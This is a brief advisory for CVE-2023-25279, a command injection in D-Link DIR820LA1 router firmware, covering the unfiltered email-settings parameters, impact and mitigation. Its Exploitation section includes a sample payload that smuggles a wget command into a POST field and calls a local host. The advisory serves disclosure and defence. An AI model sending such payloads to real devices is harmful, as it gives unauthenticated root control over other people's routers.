CVE-2023-25279

Vulnerability

The vulnerability exists in D-Link DIR820LA1 firmware version DIR820LA1_FW105B03. It is an OS command injection in the /sbin/ncc2 binary, specifically in the sub_5129BC function. The function retrieves parameters emailCfg_AccountName_1.1.0.0, emailCfg_SMTPServerAddress_1.1.0.0, emailCfg_EmailTo_1.1.0.0, and emailCfg_EmailFrom_1.1.0.0 from the /tools_email.asp page and passes them unsafely to a system call. Although a filter named hasInjectionString attempts to block command injection, it fails to filter newline characters (%0a), dollar signs ($), and other symbols, allowing bypass [1].

Exploitation

An attacker can exploit this vulnerability by sending a crafted HTTP POST request to /get_set.ccp with one of the vulnerable parameters containing a newline (%0a) followed by an arbitrary command. For example, the payload emailCfg_AccountName_1.1.0.0=%0awget http://192.168.0.2%0a injects a wget command. No authentication is required; the attacker only needs network access to the device's web interface [1].

Impact

Successful exploitation allows an attacker to execute arbitrary operating system commands as the root user, leading to full compromise of the device. This can result in unauthorized remote control, data exfiltration, or further attacks on the network [1].

Mitigation

As of the publication date (2023-03-13), no official patch has been released by D-Link. The affected firmware version DIR820LA1_FW105B03 may be end-of-life (EOL); users should consider upgrading to a supported device or applying network-level filtering to block requests to /tools_email.asp and /get_set.ccp [1][2].